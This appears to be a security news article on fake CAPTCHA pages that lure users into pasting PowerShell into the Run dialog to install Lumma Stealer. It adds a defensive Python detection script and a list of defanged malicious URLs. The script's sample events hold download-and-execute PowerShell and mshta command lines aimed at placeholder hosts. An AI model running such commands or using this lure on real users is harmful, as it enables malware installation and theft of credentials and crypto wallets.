Threat actors are continuously devising novel techniques to trap individuals, mainly to make quick financial gains by draining their crypto wallets or bank accounts. A new report has highlighted that malicious hackers are using fake CAPTCHA pages to get victims to execute their payload, which exfiltrates victims’ sensitive information and primarily targets their crypto wallets.
Imagine you are browsing the web, maybe shopping or reading an article when a familiar message pops up: “Click here to prove you are not a robot.” You solve the CAPTCHA without thinking, as it is just a normal part of being online. But what if that simple step was not as harmless as it looked?
In a report, cybersecurity experts at Palo Alto Networks’ Unit 42 revealed the use of fraudulent “human verification” pages that mimic legitimate websites. Users are tricked into executing a malicious PowerShell script, ultimately unleashing a powerful malware known as Lumma Stealer. Once a device is infected, cybercriminals can steal sensitive information, including passwords, session tokens, cryptocurrency wallets, and other personal data from the compromised machine.
This is how it works. When users land on one of these fake human verification pages, they are asked to click a button labelled “I’m not a robot.” However, instead of verifying their identity, clicking the button places a malicious PowerShell script into their clipboard. Users are then instructed to paste this code into the Windows Run dialog box. Once executed, the code silently downloads and launches the Lumma Stealer malware, which steals sensitive information and connects to attacker-controlled servers.
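The chain described above leaves a distinctive trace on the endpoint: a script interpreter spawned by explorer.exe (the parent of anything launched from the Run dialog) with a download-and-execute or hidden-window command line. The following detection logic is an added example, not code from the report or from Unit 42; the process-creation events are constructed to resemble Sysmon Event ID 1 fields, and the hostnames are placeholders.

```python
import re

# Constructed process-creation events (Sysmon Event ID 1-style fields), not from the report.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://verify.example.invalid/v.txt | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://check.example.invalid/captcha.hta"},
    {"parent": r"C:\Program Files\VSCode\Code.exe",   # benign: IDE running a build script
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File .\\build.ps1"},
    {"parent": r"C:\Windows\explorer.exe",            # benign: user opened Notepad via Run
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]

# Interpreters that the paste-into-Run lure is typically used to launch.
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe")

# Fragments that indicate a download-and-execute one-liner, an encoded command or a hidden window.
SUSPICIOUS = re.compile(
    r"(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|"
    r"\biex\b|invoke-expression|-enc\b|-encodedcommand|-w(indowstyle)?\s+hidden|https?://)",
    re.IGNORECASE,
)

def basename(path):
    """Return the file name of a Windows path, lower-cased."""
    return path.lower().rsplit("\\", 1)[-1]

def is_clickfix_like(event):
    """True when a script interpreter is started directly by explorer.exe
    (as happens from the Run dialog) with a suspicious command line."""
    if basename(event["parent"]) != "explorer.exe":
        return False
    if basename(event["image"]) not in INTERPRETERS:
        return False
    return bool(SUSPICIOUS.search(event["cmdline"]))

def flag_events(events):
    """Return the command lines of all events matching the fake-CAPTCHA pattern."""
    return [e["cmdline"] for e in events if is_clickfix_like(e)]

if __name__ == "__main__":
    for cmd in flag_events(SAMPLE_EVENTS):
        print("ALERT: interpreter launched from explorer.exe:", cmd)
```

Explorer is also the parent of interpreters started from desktop shortcuts, so in production the rule is best paired with the RunMRU registry key (the Run dialog's history) or a clipboard-paste indicator to cut false positives.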
Lumma malware has been operating as malware-as-a-service since August 2022. It steals data from browsers, including credentials, cookies, autofill, and browser extension data.
A sample malicious captcha page can look as below:
[Image: sample fake captcha page; source: Denwp Research]
Recently, CloudSEK researchers found more of these malicious pages, hosted by legitimate providers and content delivery networks, spreading the same malware. Security researcher Ax Sharma revealed that attackers have even abused GitHub notifications by submitting fake security issues that lead users to dangerous links.
Some of the fake captcha pages are:
- ch3[.]dlvideosfre[.]click/human-verify-system[.]html
- get-verified.b-cdn[.]net/captcha-verify-v5[.]html
- get-verified2.b-cdn[.]net/captcha-verify-v2[.]html
- human-check.b-cdn[.]net/verify-captcha-v7[.]html
- human-verify02.b-cdn[.]net/captcha-verify-v2[.]html
- myapt67[.]s3[.]amazonaws[.]com/human-captcha-v1[.]html
Be careful when a website asks you to run a script or command, especially if it is unfamiliar. It could be a trick to install malware on your computer. Users are advised not to paste anything into the Run dialog or a command prompt when prompted to do so by any captcha verification website. It is also extremely important to watch out for emails claiming to have found security issues, as they may not be as trustworthy as they seem. If the email directs you to a strange website, do not click on it right away. Always double-check the source to avoid falling into a trap. Staying alert can help protect your personal information and keep your computer safe. This technique, which is also used in the ClearFake campaign, demonstrates how cyberattacks are becoming more complex and sophisticated.